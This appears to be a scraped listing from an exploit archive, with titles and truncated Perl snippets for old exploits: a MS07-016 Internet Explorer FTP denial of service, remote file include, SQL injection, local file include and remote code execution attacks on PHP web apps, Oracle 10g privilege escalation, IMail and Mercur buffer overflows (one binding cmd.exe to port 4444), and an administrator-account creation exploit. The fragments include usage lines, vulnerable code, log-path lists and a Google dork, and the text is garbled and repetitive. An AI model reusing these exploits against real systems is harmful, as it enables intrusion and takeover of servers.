Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)

Microsoft Internet Explorer - FTP Server Response Denial of Service MS07-016 !/usr/bin/perl MS 07-016 FTP Server Response PoC Usage: ./ms07016ftp.pl LISTENIP Tested Against: MSIE 6.02900.2180 SP2 Details: The response is broken into buffers, either at length 1024, or at '\r\n'. Each buffer is...

News-Letterman 1.1 (eintrag.php sqllog) Remote File Include Exploit

No description provided by source. !/usr/bin/perl News-Letterman 1.1 eintrag.php Remote File Include Exploit Download: http://www.weltennetz.de/download/letterman1.1.zip Vulnerable Code: include $sqllog; Coded by bd0rk || SOH-Crew Usage: exploit.pl target cmd shell shell variable Greetings: str0k...

News-Letterman 1.1 (eintrag.php sqllog) Remote File Include Exploit

Exploit for unknown platform in category web applications =================================================================== News-Letterman 1.1 eintrag.php sqllog Remote File Include Exploit =================================================================== !/usr/bin/perl News-Letterman 1.1...

Oracle 10g - KUPW$WORKER.MAIN GrantRevoke dba Permission

Oracle 10g - KUPW$WORKER.MAIN GrantRevoke dba Permission !/usr/bin/perl Remote Oracle KUPW$WORKER.MAIN exploit 10g Grant or revoke dba permission to unprivileged user Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" REF: http://www.securityfocus.com/archive/1/440439 AUTHOR:...

Oracle 10g KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit

No description provided by source. !/usr/bin/perl Remote Oracle KUPV$FT.ATTACHJOB exploit 10g Grant or revoke dba permission to unprivileged user Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" REF: http://www.securityfocus.com/bid/16294 AUTHOR: Andrea "bunker" Purificato...

webSPELL 4.01.02 (showonly) Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \'/ "; print " -.- "; print " -------------------oOO------OOo-------------------"; print " | webSPELL v4.01.02 showonly Remote SQL Injection |"; print " | works only with...

Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl -w Advanced Poll 2.0.0 = 2.0.5-dev textfile RCE. date: 30/07/06 diwou PHCKSEC c 2001-2006. Hey, what a mad world! use strict; use warnings; use LWP::UserAgent; use MD5; args: http://url/apollpath cmd proxy: export...

Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit

Exploit for unknown platform in category web applications ======================================================== Advanced Poll = 2.0.5-dev textfile RCE. date: 30/07/06 PHCKSEC c 2001-2006. Hey, what a mad world! use strict; use warnings; use LWP::UserAgent; use MD5; args: http://url/apollpath c...

Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ======================================================== Imail 8.10-8.12 RCPT TO Remote Buffer Overflow Exploit ======================================================== !/usr/bin/perl...

Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow

Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow !/usr/bin/perl http://www.zerodayinitiative.com/advisories/ZDI-06-028.html https://www.securityfocus.com/bid/19885 acaro at jervus.it use IO::Socket::INET; use Switch; if @ARGV 3 print...

Galeria Zdjec &lt;= 3.0 (zd_numer.php) Local File Include Exploit

No description provided by source. !/usr/bin/perl Script Name: Galeria Zdjec = v3.0 zdnumer.php Local File Include Exploit Coded by : ajann Author : ajann Contact : : $$ : Free use IO::Socket; use LWP::Simple; @apache= "../../../../../var/log/httpd/accesslog",...

galeria-lfi.txt

!/usr/bin/perl Script Name: Galeria Zdjec = v3.0 zdnumer.php Local File Include Exploit Coded by : ajann Author : ajann Contact : : $$ : Free use IO::Socket; use LWP::Simple; @apache= "../../../../../var/log/httpd/accesslog", "../../../../../var/log/httpd/errorlog", "../apache/logs/error.log",...

Mafia Scum Tools 2.0.0 (index.php gen) Remote File Include Exploit

No description provided by source. !/usr/bin/perl mafia-2-0-0 Index.phpRemote File Include Vulnerability &n...

MGB 0.5.4.5 - email.php?id SQL Injection

MGB 0.5.4.5 - email.php?id SQL Injection !/usr/bin/perl MGB Google dork: intext:mgb.0.5.. & intext:mopzz | intext:mgb.0.5.4.. use IO::Socket::INET; usage unless @ARGV == 2; $host = $ARGV0; $dir = $ARGV1; $dir = "/$dir" if $dir ! /^//; $dir = "$dir/" if $dir ! //$/; $host = s/http:////g; $path...

MGB 0.5.4.5 (email.php id variable) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================================ MGB 0.5.4.5 email.php id variable Remote SQL Injection Exploit ================================================================ !/usr/bin/perl MGB new Proto = "tcp", PeerAddr...

Mercur Messaging 2005 - IMAP Remote Buffer Overflow

Mercur Messaging 2005 - IMAP Remote Buffer Overflow !/bin/perl tested on win2k server SP4 English ATTENTION! If you have an another valid account you must change the offsets this is only a poc use IO::Socket::INET; my $host = shift@ARGV; my $port = 143; my $reply; my $request; my $user = "test"; ...

qksmtp.pl.txt

!/bin/perl http://www.securityfocus.com/bid/20681 tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit credit to Greg Linares for discovered the...

Click N Print Coupons <= V2006.01 (key) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ==================================================================== Click N Print Coupons : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $di...

Click N Print Coupons 2006.01 - &#039;key&#039; SQL Injection

!/usr/bin/perl Script Name: Click N' Print Coupons : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User : "; $ID = ; chop $ID; if $ID = /exit/ print "-- Exploit FailedYou Are Exited \n"...

Fishyshoop &lt;= 0.930b Remote Add Administrator Account Exploit

No description provided by source. !/usr/bin/perl James Gray [email protected] Fishyshoop Security Vulnerability use WWW::Curl::Easy; sub usage print "$0 Fishyshoop root URL Desired E-Mail Desired Password\n"; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishysho...